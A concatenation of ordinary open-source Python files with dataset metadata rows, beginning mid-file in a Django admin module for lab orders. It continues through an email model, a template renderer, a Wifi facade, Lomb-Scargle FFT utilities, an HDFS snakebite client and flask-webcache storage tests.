('Link','link'),
('Comment','comment')])
return export_csv( request, queryset, fields)
make_csv.short_description = 'Export products as CSV'
## note: this currently breaks the selection of products from the
## order form "lense" button
def show_name(self, o):
"""truncate product name to less than 40 char"""
from django.utils.safestring import SafeUnicode
return html.format_html(
'<a href="{url}" title="{comment}">{name}</a>',
url=o.get_absolute_url(),
name=T.truncate(o.name, 40),
comment=SafeUnicode(o.comment))
show_name.short_description = 'Name'
show_name.admin_order_field = 'name'
def show_vendor(self, o):
"""Display in table: Vendor (Manufacturer)"""
r = o.vendor.name
if o.manufacturer:
r += '<br>(%s)' % o.manufacturer.name
return html.format_html(r)
show_vendor.admin_order_field = 'vendor'
show_vendor.short_description = 'Vendor'
def show_catalog(self, o):
return T.truncate(o.catalog, 15)
show_catalog.short_description = 'Catalog'
show_catalog.admin_order_field = 'catalog'
admin.site.register(Product, ProductAdmin)
class OrderAdmin(RequestFormAdmin):
form = customforms.OrderForm
raw_id_fields = ('product',)
fieldsets = ((None,
{'fields': (('status', 'is_urgent', 'product',),
('created_by', 'ordered_by', 'date_ordered',
'date_received'))}),
('Details', {'fields': (('unit_size', 'quantity'),
('price', 'po_number'),
('grant', 'grant_category'),
'comment')}))
radio_fields = {'grant': admin.VERTICAL,
'grant_category': admin.VERTICAL}
list_display = ('show_title', 'Status', 'show_urgent',
'show_quantity', 'show_price',
'requested', 'show_requestedby', 'ordered',
'received', 'show_comment',)
list_filter = ('status',
'product__category__name', 'grant', 'created_by', 'product__vendor__name',)
ordering = ('-date_created', 'product', '-date_ordered') #, 'price')
search_fields = ('comment', 'grant__name', 'grant__grant_id', 'product__name',
'product__vendor__name')
save_as = True
date_hierarchy = 'date_created'
actions = ['make_ordered', 'make_received', 'make_cancelled', 'make_csv']
def show_title(self, o):
"""truncate product name + supplier to less than 40 char"""
n = T.truncate(o.product.name, 40)
v = o.product.vendor.name
r = html.format_html('<a href="{}">{}', o.get_absolute_url(), n)
r += '<br>' if len(n) + len(v) > 37 else ' '
r += html.format_html('[{}]</a>',v)
return html.mark_safe(r)
show_title.short_description = 'Product'
def show_comment(self, obj):
"""
@return: str; truncated comment with full comment mouse-over
"""
if not obj.comment:
return ''
if len(obj.comment) < 30:
return obj.comment
r = obj.comment[:28]
r = '<a title="%s">%s</a>' % (obj.comment, T.truncate(obj.comment, 30))
return r
show_comment.short_description = 'comment'
show_comment.allow_tags = True
def show_price(self, o):
"""Workaround for bug in djmoney -- MoneyField confuses Admin formatting"""
if not o.price:
return ''
return o.price
show_price.admin_order_field = 'price'
show_price.short_description = 'Unit price'
def show_urgent(self, o):
"""Show exclamation mark if order is urgent"""
if not o.is_urgent:
return ''
return html.format_html(
'<big>❗</big>')
show_urgent.admin_order_field = 'is_urgent'
show_urgent.short_description = '!'
def show_requestedby(self,o):
return o.created_by
show_requestedby.admin_order_field = 'created_by'
show_requestedby.short_description = 'By'
def show_quantity(self, o):
return o.quantity
show_quantity.short_description = 'Q'
def make_ordered(self, request, queryset):
"""
Mark several orders as 'ordered'
see: https://docs.djangoproject.com/en/1.4/ref/contrib/admin/actions/
"""
import datetime
n = queryset.update(status='ordered', ordered_by=request.user,
date_ordered=datetime.datetime.now())
self.message_user(request, '%i orders were updated' % n)
make_ordered.short_description = 'Mark selected entries as ordered'
def make_received(self, request, queryset):
import datetime
n = queryset.update(date_received=datetime.datetime.now(),
status='received')
i = 0
for order in queryset:
order.product.status = 'ok'
order.product.save()
i += 1
self.message_user(request,
'%i orders were updated and %i products set to "in stock"'\
% (n, i))
make_received.short_description= 'Mark as received (and update product status)'
def make_cancelled(self, request, queryset):
import datetime
n = queryset.update(date_received=None, date_ordered=None,
status='cancelled')
self.message_user(request, '%i orders were set to cancelled' % n)
make_cancelled.short_description = 'Mark selected entries as cancelled'
def make_csv(self, request, queryset):
"""
Export selected orders as CSV file
"""
from collections import OrderedDict
fields = OrderedDict( [('Product', 'product.name'),
('Quantity', 'quantity'),
('Price','price'),
('Vendor','product.vendor.name'),
('Catalog','product.catalog'),
('PO Number', 'po_number'),
('Requested','date_created'),
('Requested by','created_by.username'),
('Ordered','date_ordered'),
('Ordered by','ordered_by.username'),
('Received','date_received'),
('Status','status'),
('Urgent','is_urgent'),
('Comment','comment')])
return export_csv(request, queryset, fields)
make_csv.short_description = 'Export orders as CSV'
admin.site.register(Order, OrderAdmin)
| mit | 5,380,798,477,713,165,000 | 34.864162 | 128 | 0.539608 | false | 4.361687 | false | false | false |
wa3l/mailr | email_model.py | 1 | 1590 | from flask.ext.sqlalchemy import SQLAlchemy
import html2text as convert
import time
db = SQLAlchemy()
class Email(db.Model):
"""
Email model
Store emails going through the app in a database.
"""
id = db.Column(db.Integer, primary_key=True)
to_email = db.Column(db.String(254))
to_name = db.Column(db.String(256))
from_email = db.Column(db.String(254))
from_name = db.Column(db.String(256))
subject = db.Column(db.String(78))
html = db.Column(db.UnicodeText)
text = db.Column(db.UnicodeText)
service = db.Column(db.String(10))
deliverytime = db.Column(db.BigInteger)
def __init__(self, data):
self.to_email = data['to']
self.to_name = data['to_name']
self.from_email = data['from']
self.from_name = data['from_name']
self.subject = data['subject']
self.html = data['body']
self.text = convert.html2text(data['body'])
self.service = data['service'] if data.has_key('service') else None
if data.has_key('deliverytime'):
self.deliverytime = int(data['deliverytime'])
else:
self.deliverytime = int(time.time())
def __str__(self):
return str({
'to': self.to_email,
'from': self.from_email,
'to_name': self.to_name,
'from_name': self.from_name,
'subject': self.subject,
'text': self.text,
'html': self.html,
'service': self.service,
'deliverytime': str(self.deliverytime)
})
def __repr__(self):
return str(self)
| mit | -104,383,001,852,401,000 | 28.444444 | 74 | 0.583648 | false | 3.319415 | false | false | false |
juju/juju-gui-charm | hooks/charmhelpers/core/templating.py | 1 | 3186 | # Copyright 2014-2015 Canonical Limited.
#
# This file is part of charm-helpers.
#
# charm-helpers is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3 as
# published by the Free Software Foundation.
#
# charm-helpers is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with charm-helpers. If not, see <http://www.gnu.org/licenses/>.
import os
from charmhelpers.core import host
from charmhelpers.core import hookenv
def render(source, target, context, owner='root', group='root',
perms=0o444, templates_dir=None, encoding='UTF-8', template_loader=None):
"""
Render a template.
The `source` path, if not absolute, is relative to the `templates_dir`.
The `target` path should be absolute. It can also be `None`, in which
case no file will be written.
The context should be a dict containing the values to be replaced in the
template.
The `owner`, `group`, and `perms` options will be passed to `write_file`.
If omitted, `templates_dir` defaults to the `templates` folder in the charm.
The rendered template will be written to the file as well as being returned
as a string.
Note: Using this requires python-jinja2; if it is not installed, calling
this will attempt to use charmhelpers.fetch.apt_install to install it.
"""
try:
from jinja2 import FileSystemLoader, Environment, exceptions
except ImportError:
try:
from charmhelpers.fetch import apt_install
except ImportError:
hookenv.log('Could not import jinja2, and could not import '
'charmhelpers.fetch to install it',
level=hookenv.ERROR)
raise
apt_install('python-jinja2', fatal=True)
from jinja2 import FileSystemLoader, Environment, exceptions
if template_loader:
template_env = Environment(loader=template_loader)
else:
if templates_dir is None:
templates_dir = os.path.join(hookenv.charm_dir(), 'templates')
template_env = Environment(loader=FileSystemLoader(templates_dir))
try:
source = source
template = template_env.get_template(source)
except exceptions.TemplateNotFound as e:
hookenv.log('Could not load template %s from %s.' %
(source, templates_dir),
level=hookenv.ERROR)
raise e
content = template.render(context)
if target is not None:
target_dir = os.path.dirname(target)
if not os.path.exists(target_dir):
# This is a terrible default directory permission, as the file
# or its siblings will often contain secrets.
host.mkdir(os.path.dirname(target), owner, group, perms=0o755)
host.write_file(target, content.encode(encoding), owner, group, perms)
return content
| agpl-3.0 | -3,079,095,182,892,421,000 | 38.333333 | 84 | 0.677652 | false | 4.231076 | false | false | false |
kivy/plyer | plyer/facades/wifi.py | 1 | 4169 | '''
Wifi Facade.
=============
The :class:`Wifi` is to provide access to the wifi of your mobile/ desktop
devices.
It currently supports `connecting`, `disconnecting`, `scanning`, `getting
available wifi network list` and `getting network information`.
Simple examples
---------------
To enable/ turn on wifi scanning::
>>> from plyer import wifi
>>> wifi.start_scanning()
Once the wifi is enabled/ turned on, then this command starts to scan
all the nearby available wifi networks.
To get network info::
>>> from plyer import wifi
>>> wifi.start_scanning()
>>> return wifi.get_network_info(name)
Returns network details of the network who's name/ssid is provided in the
`name` parameter.
To connect to a network::
>>> from plyer import wifi
>>> wifi.start_scanning()
>>> wifi.connect(network, parameters)
This connects to the network who's name/ssid is provided under `network`
parameter and along with other necessary methods for connection
which depends upon platform to platform.
please visit following files for more details about requirements of
`paramaters` argument in `connect` method:
plyer/platforms/win/wifi.py
plyer/platforms/macosx/wifi.py
plyer/platforms/win/wifi.py
To disconnect from wifi::
>>> from plyer import wifi
>>> wifi.disconnect()
This disconnects your device from any wifi network.
To get available wifi networks::
>>> from plyer import wifi
>>> wifi.start_scanning()
>>> return wifi.get_available_wifi()
This returns all the available wifi networks near the device.
Supported Platforms
-------------------
Windows, OS X, Linux
Ex: 6
----------
from plyer import wifi
wifi.enable()
This enables wifi device.
Ex: 7
----------
from plyer import wifi
wifi.disable()
This disable wifi device
'''
class Wifi:
'''
Wifi Facade.
'''
def is_enabled(self):
'''
Return enabled status of WiFi hardware.
'''
return self._is_enabled()
def is_connected(self, interface=None):
'''
Return connection state of WiFi interface.
.. versionadded:: 1.4.0
'''
return self._is_connected(interface=interface)
@property
def interfaces(self):
'''
List all available WiFi interfaces.
.. versionadded:: 1.4.0
'''
raise NotImplementedError()
def start_scanning(self, interface=None):
'''
Turn on scanning.
'''
return self._start_scanning(interface=interface)
def get_network_info(self, name):
'''
Return a dictionary of specified network.
'''
return self._get_network_info(name=name)
def get_available_wifi(self):
'''
Returns a list of all the available wifi.
'''
return self._get_available_wifi()
def connect(self, network, parameters, interface=None):
'''
Method to connect to some network.
'''
self._connect(
network=network,
parameters=parameters,
interface=interface
)
def disconnect(self, interface=None):
'''
To disconnect from some network.
'''
self._disconnect(interface=interface)
def enable(self):
'''
Wifi interface power state is set to "ON".
'''
self._enable()
def disable(self):
'''
Wifi interface power state is set to "OFF".
'''
self._disable()
# private
def _is_enabled(self):
raise NotImplementedError()
def _is_connected(self, interface=None):
raise NotImplementedError()
def _start_scanning(self, interface=None):
raise NotImplementedError()
def _get_network_info(self, **kwargs):
raise NotImplementedError()
def _get_available_wifi(self):
raise NotImplementedError()
def _connect(self, **kwargs):
raise NotImplementedError()
def _disconnect(self, interface=None):
raise NotImplementedError()
def _enable(self):
raise NotImplementedError()
def _disable(self):
raise NotImplementedError()
| mit | -8,623,485,429,783,333,000 | 21.294118 | 74 | 0.623411 | false | 4.284687 | false | false | false |
jakevdp/lombscargle | lombscargle/implementations/utils.py | 1 | 5934 | from __future__ import print_function, division
import numpy as np
try:
from scipy import special as scipy_special
except ImportError:
scipy_special = None
# Precomputed factorials
FACTORIALS = [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880, 3628800,
39916800, 479001600, 6227020800, 87178291200, 1307674368000]
def factorial(N):
"""Compute the factorial of N.
If N <= 16, use a fast lookup table; otherwise use scipy.special.factorial
"""
if N < len(FACTORIALS):
return FACTORIALS[N]
elif scipy_special is None:
raise ValueError("need scipy for computing larger factorials")
else:
return int(scipy_special.factorial(N))
def bitceil(N):
"""
Find the bit (i.e. power of 2) immediately greater than or equal to N
Note: this works for numbers up to 2 ** 64.
Roughly equivalent to int(2 ** np.ceil(np.log2(N)))
"""
# Note: for Python 2.7 and 3.x, this is faster:
# return 1 << int(N - 1).bit_length()
N = int(N) - 1
for i in [1, 2, 4, 8, 16, 32]:
N |= N >> i
return N + 1
def extirpolate(x, y, N=None, M=4):
"""
Extirpolate the values (x, y) onto an integer grid range(N),
using lagrange polynomial weights on the M nearest points.
Parameters
----------
x : array_like
array of abscissas
y : array_like
array of ordinates
N : int
number of integer bins to use. For best performance, N should be larger
than the maximum of x
M : int
number of adjoining points on which to extirpolate.
Returns
-------
yN : ndarray
N extirpolated values associated with range(N)
Example
-------
>>> rng = np.random.RandomState(0)
>>> x = 100 * rng.rand(20)
>>> y = np.sin(x)
>>> y_hat = extirpolate(x, y)
>>> x_hat = np.arange(len(y_hat))
>>> f = lambda x: np.sin(x / 10)
>>> np.allclose(np.sum(y * f(x)), np.sum(y_hat * f(x_hat)))
True
Notes
-----
This code is based on the C implementation of spread() presented in
Numerical Recipes in C, Second Edition (Press et al. 1989; p.583).
"""
if not hasattr(np.ufunc, 'at'):
raise NotImplementedError("extirpolate functionality requires numpy "
"version 1.8 or newer")
x, y = map(np.ravel, np.broadcast_arrays(x, y))
if N is None:
N = int(np.max(x) + 0.5 * M + 1)
# Now use legendre polynomial weights to populate the results array;
# This is an efficient recursive implementation (See Press et al. 1989)
result = np.zeros(N, dtype=y.dtype)
# first take care of the easy cases where x is an integer
integers = (x % 1 == 0)
np.add.at(result, x[integers].astype(int), y[integers])
x, y = x[~integers], y[~integers]
# For each remaining x, find the index describing the extirpolation range.
# i.e. ilo[i] < x[i] < ilo[i] + M with x[i] in the center,
# adjusted so that the limits are within the range 0...N
ilo = np.clip((x - M // 2).astype(int), 0, N - M)
numerator = y * np.prod(x - ilo - np.arange(M)[:, np.newaxis], 0)
denominator = factorial(M - 1)
for j in range(M):
if j > 0:
denominator *= j / (j - M)
ind = ilo + (M - 1 - j)
np.add.at(result, ind, numerator / (denominator * (x - ind)))
return result
def trig_sum(t, h, df, N, f0=0, freq_factor=1,
oversampling=5, use_fft=True, Mfft=4):
"""Compute (approximate) trigonometric sums for a number of frequencies
This routine computes weighted sine and cosine sums:
S_j = sum_i { h_i * sin(2 pi * f_j * t_i) }
C_j = sum_i { h_i * cos(2 pi * f_j * t_i) }
Where f_j = freq_factor * (f0 + j * df) for the values j in 1 ... N.
The sums can be computed either by a brute force O[N^2] method, or
by an FFT-based O[Nlog(N)] method.
Parameters
----------
t : array_like
array of input times
h : array_like
array weights for the sum
df : float
frequency spacing
N : int
number of frequency bins to return
f0 : float (optional, default=0)
The low frequency to use
freq_factor : float (optional, default=1)
Factor which multiplies the frequency
use_fft : bool
if True, use the approximate FFT algorithm to compute the result.
This uses the FFT with Press & Rybicki's Lagrangian extirpolation.
oversampling : int (default = 5)
oversampling freq_factor for the approximation; roughtly the number of
time samples across the highest-frequency sinusoid. This parameter
contains the tradeoff between accuracy and speed. Not referenced
if use_fft is False.
Mfft : int
The number of adjacent points to use in the FFT approximation.
Not referenced if use_fft is False.
Returns
-------
S, C : ndarrays
summation arrays for frequencies f = df * np.arange(1, N + 1)
"""
df *= freq_factor
f0 *= freq_factor
assert df > 0
t, h = map(np.ravel, np.broadcast_arrays(t, h))
if use_fft:
Mfft = int(Mfft)
assert(Mfft > 0)
# required size of fft is the power of 2 above the oversampling rate
Nfft = bitceil(N * oversampling)
t0 = t.min()
if f0 > 0:
h = h * np.exp(2j * np.pi * f0 * (t - t0))
tnorm = ((t - t0) * Nfft * df) % Nfft
grid = extirpolate(tnorm, h, Nfft, Mfft)
fftgrid = np.fft.ifft(grid)
if t0 != 0:
f = f0 + df * np.arange(Nfft)
fftgrid *= np.exp(2j * np.pi * t0 * f)
fftgrid = fftgrid[:N]
C = Nfft * fftgrid.real
S = Nfft * fftgrid.imag
else:
f = f0 + df * np.arange(N)
C = np.dot(h, np.cos(2 * np.pi * f * t[:, np.newaxis]))
S = np.dot(h, np.sin(2 * np.pi * f * t[:, np.newaxis]))
return S, C
| bsd-3-clause | 7,082,537,745,301,977,000 | 30.903226 | 79 | 0.582406 | false | 3.333708 | false | false | false |
17zuoye/luigi | luigi/contrib/hdfs/snakebite_client.py | 1 | 10933 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
A luigi file system client that wraps around snakebite
Originally written by Alan Brenner <[email protected]> github.com/alanbbr
"""
from luigi.contrib.hdfs import config as hdfs_config
from luigi.contrib.hdfs import error as hdfs_error
from luigi.contrib.hdfs import hadoopcli_clients as hdfs_hadoopcli_clients
from luigi import six
import luigi.contrib.target
import logging
import datetime
import os
logger = logging.getLogger('luigi-interface')
class SnakebiteHdfsClient(hdfs_hadoopcli_clients.HdfsClient):
"""
A hdfs client using snakebite. Since Snakebite has a python API, it'll be
about 100 times faster than the hadoop cli client, which does shell out to
a java program on each file system operation.
"""
def __init__(self):
super(SnakebiteHdfsClient, self).__init__()
self._bite = None
self.pid = -1
@staticmethod
def list_path(path):
if isinstance(path, list) or isinstance(path, tuple):
return path
if isinstance(path, str) or isinstance(path, unicode):
return [path, ]
return [str(path), ]
def get_bite(self):
"""
If Luigi has forked, we have a different PID, and need to reconnect.
"""
config = hdfs_config.hdfs()
if self.pid != os.getpid() or not self._bite:
client_kwargs = dict(filter(
lambda k_v: k_v[1] is not None and k_v[1] != '', six.iteritems({
'hadoop_version': config.client_version,
'effective_user': config.effective_user,
})
))
if config.snakebite_autoconfig:
"""
This is fully backwards compatible with the vanilla Client and can be used for a non HA cluster as well.
This client tries to read ``${HADOOP_PATH}/conf/hdfs-site.xml`` to get the address of the namenode.
The behaviour is the same as Client.
"""
from snakebite.client import AutoConfigClient
self._bite = AutoConfigClient(**client_kwargs)
else:
from snakebite.client import Client
self._bite = Client(config.namenode_host, config.namenode_port, **client_kwargs)
return self._bite
def exists(self, path):
"""
Use snakebite.test to check file existence.
:param path: path to test
:type path: string
:return: boolean, True if path exists in HDFS
"""
try:
return self.get_bite().test(path, exists=True)
except Exception as err: # IGNORE:broad-except
raise hdfs_error.HDFSCliError("snakebite.test", -1, str(err), repr(err))
def rename(self, path, dest):
"""
Use snakebite.rename, if available.
:param path: source file(s)
:type path: either a string or sequence of strings
:param dest: destination file (single input) or directory (multiple)
:type dest: string
:return: list of renamed items
"""
parts = dest.rstrip('/').split('/')
if len(parts) > 1:
dir_path = '/'.join(parts[0:-1])
if not self.exists(dir_path):
self.mkdir(dir_path, parents=True)
return list(self.get_bite().rename(self.list_path(path), dest))
def rename_dont_move(self, path, dest):
"""
Use snakebite.rename_dont_move, if available.
:param path: source path (single input)
:type path: string
:param dest: destination path
:type dest: string
:return: True if succeeded
:raises: snakebite.errors.FileAlreadyExistsException
"""
from snakebite.errors import FileAlreadyExistsException
try:
self.get_bite().rename2(path, dest, overwriteDest=False)
return True
except FileAlreadyExistsException:
return False
def remove(self, path, recursive=True, skip_trash=False):
"""
Use snakebite.delete, if available.
:param path: delete-able file(s) or directory(ies)
:type path: either a string or a sequence of strings
:param recursive: delete directories trees like \*nix: rm -r
:type recursive: boolean, default is True
:param skip_trash: do or don't move deleted items into the trash first
:type skip_trash: boolean, default is False (use trash)
:return: list of deleted items
"""
return list(self.get_bite().delete(self.list_path(path), recurse=recursive))
def chmod(self, path, permissions, recursive=False):
"""
Use snakebite.chmod, if available.
:param path: update-able file(s)
:type path: either a string or sequence of strings
:param permissions: \*nix style permission number
:type permissions: octal
:param recursive: change just listed entry(ies) or all in directories
:type recursive: boolean, default is False
:return: list of all changed items
"""
if type(permissions) == str:
permissions = int(permissions, 8)
return list(self.get_bite().chmod(self.list_path(path),
permissions, recursive))
def chown(self, path, owner, group, recursive=False):
"""
Use snakebite.chown/chgrp, if available.
One of owner or group must be set. Just setting group calls chgrp.
:param path: update-able file(s)
:type path: either a string or sequence of strings
:param owner: new owner, can be blank
:type owner: string
:param group: new group, can be blank
:type group: string
:param recursive: change just listed entry(ies) or all in directories
:type recursive: boolean, default is False
:return: list of all changed items
"""
bite = self.get_bite()
if owner:
if group:
return all(bite.chown(self.list_path(path), "%s:%s" % (owner, group),
recurse=recursive))
return all(bite.chown(self.list_path(path), owner, recurse=recursive))
return list(bite.chgrp(self.list_path(path), group, recurse=recursive))
def count(self, path):
"""
Use snakebite.count, if available.
:param path: directory to count the contents of
:type path: string
:return: dictionary with content_size, dir_count and file_count keys
"""
try:
res = self.get_bite().count(self.list_path(path)).next()
dir_count = res['directoryCount']
file_count = res['fileCount']
content_size = res['spaceConsumed']
except StopIteration:
dir_count = file_count = content_size = 0
return {'content_size': content_size, 'dir_count': dir_count,
'file_count': file_count}
def get(self, path, local_destination):
"""
Use snakebite.copyToLocal, if available.
:param path: HDFS file
:type path: string
:param local_destination: path on the system running Luigi
:type local_destination: string
"""
return list(self.get_bite().copyToLocal(self.list_path(path),
local_destination))
def mkdir(self, path, parents=True, mode=0o755, raise_if_exists=False):
"""
Use snakebite.mkdir, if available.
Snakebite's mkdir method allows control over full path creation, so by
default, tell it to build a full path to work like ``hadoop fs -mkdir``.
:param path: HDFS path to create
:type path: string
:param parents: create any missing parent directories
:type parents: boolean, default is True
:param mode: \*nix style owner/group/other permissions
:type mode: octal, default 0755
"""
result = list(self.get_bite().mkdir(self.list_path(path),
create_parent=parents, mode=mode))
if raise_if_exists and "ile exists" in result[0].get('error', ''):
raise luigi.target.FileAlreadyExists("%s exists" % (path, ))
return result
def listdir(self, path, ignore_directories=False, ignore_files=False,
include_size=False, include_type=False, include_time=False,
recursive=False):
"""
Use snakebite.ls to get the list of items in a directory.
:param path: the directory to list
:type path: string
:param ignore_directories: if True, do not yield directory entries
:type ignore_directories: boolean, default is False
:param ignore_files: if True, do not yield file entries
:type ignore_files: boolean, default is False
:param include_size: include the size in bytes of the current item
:type include_size: boolean, default is False (do not include)
:param include_type: include the type (d or f) of the current item
:type include_type: boolean, default is False (do not include)
:param include_time: include the last modification time of the current item
:type include_time: boolean, default is False (do not include)
:param recursive: list subdirectory contents
:type recursive: boolean, default is False (do not recurse)
:return: yield with a string, or if any of the include_* settings are
true, a tuple starting with the path, and include_* items in order
"""
bite = self.get_bite()
for entry in bite.ls(self.list_path(path), recurse=recursive):
if ignore_directories and entry['file_type'] == 'd':
continue
if ignore_files and entry['file_type'] == 'f':
continue
rval = [entry['path'], ]
if include_size:
rval.append(entry['length'])
if include_type:
rval.append(entry['file_type'])
if include_time:
rval.append(datetime.datetime.fromtimestamp(entry['modification_time'] / 1000))
if len(rval) > 1:
yield tuple(rval)
else:
yield rval[0]
| apache-2.0 | -2,731,325,352,027,294,000 | 38.90146 | 120 | 0.60697 | false | 4.171309 | true | false | false |
jonathanstrong/functor | setup.py | 1 | 1091 | #!/usr/bin/env python
# Bootstrap installation of Distribute
import distribute_setup
distribute_setup.use_setuptools()
import os
from setuptools import setup
PROJECT = u'Functor'
VERSION = '0.1'
URL = ''
AUTHOR = u'Jonathan Strong'
AUTHOR_EMAIL = u'[email protected]'
DESC = "Implements a function-object pattern in Python."
def read_file(file_name):
file_path = os.path.join(
os.path.dirname(__file__),
file_name
)
return open(file_path).read()
setup(
name=PROJECT,
version=VERSION,
description=DESC,
long_description=read_file('README.md'),
author=AUTHOR,
author_email=AUTHOR_EMAIL,
url=URL,
license=read_file('LICENSE'),
namespace_packages=[],
packages=[u'functor'],
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Requirements -*-
],
entry_points = {
# -*- Entry points -*-
},
classifiers=[
# see http://pypi.python.org/pypi?:action=list_classifiers
# -*- Classifiers -*-
"Programming Language :: Python",
],
)
| mit | 4,604,809,639,414,675,000 | 20.82 | 63 | 0.628781 | false | 3.519355 | false | false | false |
fusic-com/flask-webcache | tests/test_storage.py | 1 | 12927 | from __future__ import unicode_literals
import unittest
from datetime import timedelta, datetime
from six.moves.cPickle import dumps, loads
from six import iteritems
from flask import Flask, send_file
from werkzeug.wrappers import Response
from werkzeug.datastructures import HeaderSet
from werkzeug.contrib.cache import SimpleCache
from flask_webcache.storage import Config, Metadata, Store, Retrieval
from flask_webcache.storage import (CacheMiss, NoResourceMetadata, NoMatchingRepresentation, NotFreshEnoughForClient,
RecacheRequested)
from flask_webcache.recache import RECACHE_HEADER
from flask_webcache.utils import werkzeug_cache_get_or_add
from testutils import compare_numbers
a = Flask(__name__)
class UtilsTestCase(unittest.TestCase):
def test_config_kwargs(self):
with self.assertRaises(TypeError):
Config(foo=1)
def test_metadata_datastructure(self):
def check_metadata(m):
self.assertEquals(m.salt, 'qux')
self.assertIn('foo', m.vary)
self.assertIn('bar', m.vary)
m = Metadata(HeaderSet(('foo', 'bar')), 'qux')
check_metadata(m)
check_metadata(loads(dumps(m)))
m2 = Metadata(HeaderSet(('foo', 'bar')), 'qux')
self.assertEquals(m, m2)
m3 = Metadata(HeaderSet(('foo', 'bar')), 'notqux')
self.assertNotEquals(m2, m3)
class StorageTestCase(unittest.TestCase):
def setUp(self):
self.c = SimpleCache()
self.s = Store(self.c)
self.r = Retrieval(self.c)
def test_basic_cachability(self):
with a.test_request_context('/foo'):
self.assertFalse(self.s.should_cache_response(Response(x for x in 'foo')))
self.assertTrue(self.s.should_cache_response(Response(status=204)))
self.assertFalse(self.s.should_cache_response(Response(status=500)))
self.assertTrue(self.s.should_cache_response(Response('foo')))
self.assertTrue(self.s.should_cache_response(Response()))
r = Response()
r.vary.add('*')
self.assertFalse(self.s.should_cache_response(r))
with a.test_request_context('/foo', method='HEAD'):
self.assertFalse(self.s.should_cache_response(Response('foo')))
with a.test_request_context('/foo', method='POST'):
self.assertFalse(self.s.should_cache_response(Response('foo')))
def test_cache_control_cachability(self):
def check_response_with_cache_control(**cc):
r = Response()
for k, v in iteritems(cc):
setattr(r.cache_control, k, v)
return self.s.should_cache_response(r)
with a.test_request_context():
self.assertTrue(check_response_with_cache_control(max_age=10))
self.assertTrue(check_response_with_cache_control(must_revalidate=True))
self.assertFalse(check_response_with_cache_control(max_age=0))
self.assertFalse(check_response_with_cache_control(private=True))
self.assertFalse(check_response_with_cache_control(no_cache=True))
self.assertFalse(check_response_with_cache_control(no_store=True))
def test_expire_cachability(self):
def check_response_with_expires(dt):
r = Response()
r.expires = dt
return self.s.should_cache_response(r)
with a.test_request_context():
self.assertFalse(check_response_with_expires(datetime.utcnow() - timedelta(seconds=1)))
self.assertTrue(check_response_with_expires(datetime.utcnow() + timedelta(seconds=1)))
def test_default_cachability(self):
with a.test_request_context('/foo'):
self.assertTrue(self.s.should_cache_response(Response()))
with a.test_request_context('/foo', query_string='?bar'):
self.assertFalse(self.s.should_cache_response(Response()))
def test_x_cache_headers(self):
r = Response()
self.s.mark_cache_hit(r)
self.assertEquals(r.headers[self.s.X_CACHE_HEADER], 'hit')
self.s.mark_cache_miss(r)
self.assertEquals(r.headers[self.s.X_CACHE_HEADER], 'miss')
def test_metadata_miss(self):
with self.assertRaises(NoResourceMetadata):
with a.test_request_context('/foo'):
self.r.fetch_metadata()
def test_response_miss(self):
with self.assertRaises(NoResourceMetadata):
with a.test_request_context('/foo'):
self.r.fetch_response()
def test_store_retrieve_cycle(self):
with a.test_request_context('/foo'):
r = Response('foo')
self.s.cache_response(r)
self.assertEquals(len(self.c._cache), 2)
r2 = self.r.fetch_response()
self.assertEquals(r.data, r2.data)
def test_vary_miss(self):
with a.test_request_context('/foo', headers=(('accept-encoding', 'gzip'),)):
r = Response('foo')
r.vary.add('accept-encoding')
r.content_encoding = 'gzip'
self.s.cache_response(r)
with self.assertRaises(NoMatchingRepresentation):
with a.test_request_context('/foo'):
self.r.fetch_response()
def test_invalidation_condition(self):
with a.test_request_context('/foo', method="PUT"):
r = Response('foo')
self.assertTrue(self.s.should_invalidate_resource(r))
r = Response('foo', status=500)
self.assertFalse(self.s.should_invalidate_resource(r))
with a.test_request_context('/foo'):
r = Response('foo')
self.assertFalse(self.s.should_invalidate_resource(r))
def test_invalidation(self):
with a.test_request_context('/foo'):
r = Response('foo')
self.s.cache_response(r)
self.assertEquals(len(self.c._cache), 2)
with a.test_request_context('/foo', method="PUT"):
r = Response('foo')
self.assertTrue(self.s.should_invalidate_resource(r))
self.s.invalidate_resource()
self.assertEquals(len(self.c._cache), 1)
with self.assertRaises(CacheMiss):
with a.test_request_context('/foo'):
self.r.fetch_response()
def test_master_salt_invalidation(self):
with a.test_request_context('/foo'):
r = Response('foo')
self.s.cache_response(r)
self.assertEquals(self.r.fetch_response().data, b'foo')
self.r.config.master_salt = 'newsalt'
with self.assertRaises(NoMatchingRepresentation):
self.r.fetch_response()
def test_request_cache_controls(self):
with a.test_request_context('/foo'):
self.assertTrue(self.r.should_fetch_response())
with a.test_request_context('/foo', method='HEAD'):
self.assertTrue(self.r.should_fetch_response())
with a.test_request_context('/foo', method='POST'):
self.assertFalse(self.r.should_fetch_response())
with a.test_request_context('/foo', headers=(('cache-control', 'no-cache'),)):
self.assertFalse(self.r.should_fetch_response())
with a.test_request_context('/foo', headers=(('pragma', 'no-cache'),)):
self.assertFalse(self.r.should_fetch_response())
with a.test_request_context('/foo', headers=(('cache-control', 'max-age=0'),)):
self.assertFalse(self.r.should_fetch_response())
with a.test_request_context('/foo', headers=(('cache-control', 'max-age=5'),)):
self.assertTrue(self.r.should_fetch_response())
def test_response_freshness_seconds(self):
# this test is raced; if running it takes about a second, it might fail
r = Response()
self.assertEquals(0, self.r.response_freshness_seconds(r))
r.date = datetime.utcnow()
self.assertTrue(compare_numbers(self.s.DEFAULT_EXPIRATION_SECONDS,
self.r.response_freshness_seconds(r),
1))
r.expires = datetime.utcnow() + timedelta(seconds=345)
self.assertTrue(compare_numbers(345, self.r.response_freshness_seconds(r), 1))
r.cache_control.max_age=789
self.assertTrue(compare_numbers(789, self.r.response_freshness_seconds(r), 1))
